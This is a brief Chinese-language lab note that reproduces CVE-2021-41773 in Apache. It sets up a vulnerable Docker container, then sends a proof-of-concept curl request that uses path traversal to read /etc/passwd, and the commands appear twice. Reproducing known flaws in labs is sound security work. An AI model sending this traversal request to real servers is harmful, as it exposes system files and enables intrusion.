1.环境搭建
docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -d -p 8080:80 97308de4753d

2.使用poc
curl http://192.16.10.190:8080/cgi-bin/../../../../etc/passwd

3.工具验证

docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -d -p 8080:80 97308de4753d
curl http://192.16.10.190:8080/cgi-bin/../../../../etc/passwd